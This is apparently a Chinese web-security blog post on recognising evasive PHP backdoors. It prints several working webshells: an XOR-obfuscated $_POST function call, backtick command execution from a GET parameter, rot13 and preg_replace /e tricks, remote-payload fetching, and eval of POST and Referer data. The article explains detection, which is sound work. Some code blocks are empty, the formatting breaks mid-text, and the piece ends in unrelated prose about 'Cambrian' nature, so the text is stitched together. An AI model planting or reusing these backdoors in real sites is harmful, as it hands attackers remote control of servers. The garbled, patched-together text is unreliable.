教你识别简单的免查杀PHP后门

这类后门对于网站、服务器管理员而言，无疑是一大挑战。他们必须时刻保持警惕，不断更新检测方法，以应对不断变化的攻击手法。今天，让我们来一些有趣的PHP一句话木马。

最常见的PHP一句话后门可能如下：

```php

```

或这样：

```php

```

攻击者会利用各种技巧来隐藏这些明显的代码。例如，一种构造技巧是利用PHP的特性生成不易被发现的代码。例如：

```php

@$_++; // $_ = 1

$__=(""^"|"); // $__ = _

$__.=("."^"~"); // _P

$__.=("/"^"`"); // _PO

$__.=("|"^"/"); // _POS

$__.=("{"^"/"); // _POST

${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);

?>

```

再填充一些普通代码进行伪装，一个简单的“免杀”shell样本就诞生了。另一种简单的后门代码如下：

```php

$c=urldecode($_GET['c']);

if($c){`$c`;} //完整

!$_GET['c']||`{$_GET['c']}`;//精简

?>

``` 原理在于PHP会直接执行包含在``符号中的命令。这意味着只要通过URL传递特定命令，就能控制服务器执行相应操作。示例：通过访问 还有一种代码虽然简单，但同样具有危险性： ``php preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[tr]);'),"saft"); ?> `` 这段代码中的关键部分是解密和执行恶意代码的过程。近期捕获的一个基于PHP的webshell样本，其代码动态生成和页面伪装手法十分独特。Webshell代码如下： ``php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8"); if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents( sprintf('%s?%s',pack("H",'一串加密字符串'),uniqid())),3649); @preg_replace("~(.)~ies",gzunpress($_SESSION['api']),null); ?> `` 其中，关键的代码部分通过调用函数和字符串操作来执行恶意代码。攻击者利用这种方法可以巧妙地绕过安全检测，实现恶意目的。对于网站和服务器管理员来说，防范这类后门需要时刻保持警惕，不断更新和改进检测方法。作为用户，我们也应该提高安全意识，避免在不安全的网站上输入敏感信息或执行未知命令。在这些隐藏的PHP后门代码时，我们仿佛进入了一个充满智慧的迷宫。这些代码不仅展示了编程的复杂性，还揭示了安全领域中的无尽挑战。让我们以一种学习和理解的态度来对待这些代码，感受编程的魅力。

```php

$maliciousContentUrl = sprintf('%s?%s', pack("H", '...'), uniqid()); // 此处省略了具体的URL编码

$content = file_get_contents($maliciousContentUrl); // 从特定URL获取内容

echo gzuncompress(substr($content, 3649)); // 解压并显示内容

?>

```

```php

session_start();

if(isset($_POST['code'])) {

$code = trim($_POST['code']);

$_SESSION['theCode'] = $code;

eval($code); // 执行代码

}

?>

```

```php

if(isset($_GET['a']) && isset($_GET['b'])){

$code = base64_decode($_GET['b']); // 解码GET参数b中的代码

file_put_contents('c.php', ""); // 将解码后的代码写入c.php文件

}

?>

```

文件1（1.php）:

```php

header('Content-type:text/html;charset=utf-8');

if(isset($_SERVER['HTTP_REFERER']) && strpos($_SERVER['HTTP_REFERER'], 'a=10') !== false) {

$code = base64_decode(str_replace(' ', '+', $_SERVER['HTTP_REFERER']));

eval($code);

}

?>

```

在这片神奇的土地上，时间的流转似乎赋予了它无尽的创造力。每一寸土地，每一滴水，都承载着亿万年的岁月痕迹，见证了生命的诞生与演化。在这里，你可以看到大自然的鬼斧神工，感受到生命的顽强与坚韧。

走进Cambrian的深处，仿佛进入了一个神秘的世界。这里的景象让人惊叹不已，让人心生敬畏。山川相连，河流蜿蜒，海洋广袤无垠。在这片土地上，生命的繁衍与演化得到了最好的诠释。古老的生物在这里留下了生命的印记，而新的生命也在不断诞生，共同构成了这个充满活力的生态圈。

在这里，你可以感受到大地的呼吸，听到山川的呼唤。每一片森林，每一片草地，都在诉说着生命的故事。那些形态各异的植物、动物，它们在这里繁衍生息，共同演绎着生命的华章。

Cambrian的每一刻都是独特的，都是值得珍惜的。这里的日出日落，星空璀璨，让人陶醉其中。在这片土地上，你可以感受到大自然的温暖与关爱，可以感受到生命的无限可能。

当你深入了解Cambrian时，你会发现这里不仅仅是一个地方，更是一个充满生命力的世界。这里的一切都在不断地变化，都在不断地成长。在这里，你可以找到属于自己的那份力量，那份勇气，去追寻自己的梦想。

让我们共同走进Cambrian的世界，感受这份独特的魅力。让我们在这里留下美好的回忆，共同见证生命的奇迹。因为在这里，每一个瞬间都是永恒的，每一个生命都是珍贵的。